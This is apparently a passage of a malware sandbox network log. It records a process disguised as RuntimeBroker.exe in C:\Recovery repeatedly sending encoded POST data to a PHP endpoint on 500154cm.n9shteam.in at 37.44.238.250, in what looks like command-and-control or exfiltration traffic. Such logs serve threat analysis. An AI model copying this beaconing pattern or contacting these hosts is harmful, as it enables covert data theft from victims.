                                                                                                            Nov 12, 2024 00:42:19.994110107 CET2512OUTData Raw: 54 56 5b 56 56 5c 59 5b 5c 58 5a 51 50 53 58 51 5b 56 5e 5c 55 5f 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV[VV\Y[\XZQPSXQ[V^\U_Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\']. %>5>C0586^ = >X#(-P3X=*%&]4Z(5&[!"^.
Nov 12, 2024 00:42:20.214418888 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:20.291225910 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:20 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49739 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:21.065226078 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:42:21.415997982 CET | 2512 | OUT | Data Raw: 54 54 5b 5e 56 5f 59 52 5c 58 5a 51 50 5e 58 52 5b 56 5e 5a 55 5d 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TT[^V_YR\XZQP^XR[V^ZU]Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$9!>(&"E$;!(R*06^!)Q0)Y=)!0=(%&[!"^.9
Nov 12, 2024 00:42:21.630490065 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:21.703578949 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:21 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49741 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:21.939548016 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:42:22.290970087 CET | 2512 | OUT | Data Raw: 51 55 5b 53 53 58 59 59 5c 58 5a 51 50 5e 58 54 5b 52 5e 5d 55 59 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU[SSXYY\XZQP^XT[R^]UYZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^93>*V!?5%64!')_!%T'5](&&X!#5\(%&[!"^.9
Nov 12, 2024 00:42:22.505284071 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:22.613277912 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:22 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49745 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:24.400985003 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1812
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:42:24.760230064 CET | 1812 | OUT | Data Raw: 51 53 5b 54 56 59 5c 58 5c 58 5a 51 50 52 58 57 5b 51 5e 5a 55 5e 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[TVY\X\XZQPRXW[Q^ZU^ZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X90!?+)56A3$[!^#=3Z65P0-=](5[ )(%&[!"^.
Nov 12, 2024 00:42:24.985726118 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:25.058029890 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:24 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0d 2b 03 06 07 36 3c 3b 09 39 3d 3d 0d 25 1e 3c 5b 3c 2b 38 1a 21 3d 20 12 38 30 31 51 37 00 34 5d 24 2a 08 07 23 59 21 18 3c 38 21 5b 05 12 22 05 34 15 30 12 2b 3c 3b 07 3a 0f 0e 03 22 20 2f 16 3a 07 0a 0b 3f 2a 3a 0d 30 3c 29 0a 24 1f 05 03 2f 2e 35 04 2a 2f 0e 09 35 34 2e 55 0b 11 23 19 30 3b 23 56 20 2f 0d 58 26 2d 3b 09 21 13 00 53 26 5c 2b 0e 27 3a 05 13 25 32 3e 10 32 0c 07 07 27 29 39 5e 29 5f 24 00 27 10 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "+6<;9==%<[<+8!= 801Q74]$*#Y!<8!["40+<;:" /:?*:0<)$/.5*/54.U#0;#V /X&-;!S&\+':%2>2')9^)_$'#Q-/V=[W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49747 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:29.033304930 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:42:29.385356903 CET | 2512 | OUT | Data Raw: 54 53 5b 51 56 5b 59 5d 5c 58 5a 51 50 5e 58 54 5b 50 5e 5f 55 5f 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TS[QV[Y]\XZQP^XT[P^_U_ZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.2[>!,5'%'!8<V)#.Z6&0>)>!3"<5&[!"^.9
Nov 12, 2024 00:42:29.600366116 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:29.672290087 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:29 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49748 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:30.078450918 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1800
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:42:30.431654930 CET | 1800 | OUT | Data Raw: 51 54 5e 52 53 5b 59 52 5c 58 5a 51 50 5a 58 5d 5b 54 5e 51 55 58 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT^RS[YR\XZQPZX][T^QUXZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\']-%>8""%$36'>6(3=!]*:#<&[!"^.
Nov 12, 2024 00:42:30.646241903 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49749 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:30.323677063 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:42:30.681833029 CET | 2512 | OUT | Data Raw: 51 53 5b 51 56 5b 59 5a 5c 58 5a 51 50 5c 58 5c 5b 56 5e 58 55 5d 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[QV[YZ\XZQP\X\[V^XU]Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'_-6[=:"A3(!+')U56;>'=)\*C-!0(%&[!"^.1
Nov 12, 2024 00:42:30.889199972 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:30.969182968 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:30 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49750 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:31.785517931 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49752 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:32.402479887 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:42:32.759845972 CET | 2512 | OUT | Data Raw: 54 50 5b 5e 56 5c 59 5a 5c 58 5a 51 50 5e 58 50 5b 51 5e 5b 55 59 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP[^V\YZ\XZQP^XP[Q^[UYZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X.3!=8=6*%% Y!(U)3"(3=>(%"[4=)%&[!"^.9
Nov 12, 2024 00:42:32.987780094 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:33.070226908 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:32 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49753 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:33.662520885 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
Nov 12, 2024 00:42:34.009813070 CET | 2512 | OUT | Data Raw: 54 52 5b 54 53 5b 5c 58 5c 58 5a 51 50 53 58 5c 5b 54 5e 5e 55 5e 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TR[TS[\X\XZQPSX\[T^^U^ZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.5=9V""C06$Z!?=#6"(5'>)C"X43"+%&[!"^.
Nov 12, 2024 00:42:34.227639914 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:34.310503006 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:34 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49754 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:34.528309107 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
Nov 12, 2024 00:42:34.884875059 CET | 2512 | OUT | Data Raw: 54 50 5e 52 53 5c 59 5b 5c 58 5a 51 50 5b 58 52 5b 54 5e 5a 55 55 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP^RS\Y[\XZQP[XR[T^ZUUZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'_.)1W5)$5<U(358)'&>)#V)](%&[!"^.-
Nov 12, 2024 00:42:35.096375942 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:35.169240952 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:35 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49756 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:35.369682074 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49757 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:35.710448980 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1800
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:36.056922913 CET1800OUTData Raw: 54 56 5b 53 53 5c 5c 5d 5c 58 5a 51 50 5a 58 5c 5b 55 5e 5e 55 5c 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV[SS\\]\XZQPZX\[U^^U\ZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'Y,0!?+!6C$5;68*3="+"3!(%*Y +&[!"^.
Nov 12, 2024 00:42:36.295454979 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:36.371891975 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:36 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 21 1f 2a 2d 20 00 21 3f 2c 1b 2d 10 00 13 32 09 27 01 2b 16 0a 1a 23 3d 2b 05 38 1d 39 51 22 2e 38 14 33 5c 36 02 34 3f 2d 1a 3f 02 21 5b 05 12 21 5d 22 2b 09 08 3f 3c 38 58 2d 31 27 5a 20 33 20 06 2e 39 0d 19 3d 17 25 54 27 02 03 0a 30 31 30 10 2d 00 3e 5d 2b 11 37 56 22 34 2e 55 0b 11 20 0b 33 16 01 57 22 3f 3f 5b 26 3e 23 0d 36 04 21 08 25 14 2c 56 25 39 23 1e 26 21 00 5a 31 22 3e 15 25 2a 35 5b 3e 3a 3f 12 24 3a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: !*- !?,-2'+#=+89Q".83\64?-?![!]"+?<8X-1'Z 3 .9=%T'010->]+7V"4.U 3W"??[&>#6!%,V%9#&!Z1">%*5[>:?$:#Q-/V=[W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49758 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:35.872054100 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:36.228596926 CET2512OUTData Raw: 54 50 5e 55 56 59 59 5b 5c 58 5a 51 50 5c 58 52 5b 54 5e 5c 55 59 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP^UVYY[\XZQP\XR[T^\UYZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'\.0\=+1T5)$4!^<>3>Z6;63>>*%] =+&[!"^.1
Nov 12, 2024 00:42:36.456948042 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:36.539707899 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:36 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49759 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:36.738367081 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:37.088108063 CET2512OUTData Raw: 51 54 5e 51 53 5d 59 5f 5c 58 5a 51 50 58 58 5c 5b 5d 5e 50 55 54 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT^QS]Y_\XZQPXX\[]^PUTZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'Y- _>"&B$4^!(*#!8-'.%)&Y4 \+5&[!"^.!
Nov 12, 2024 00:42:37.324107885 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:37.399935961 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:37 GMT
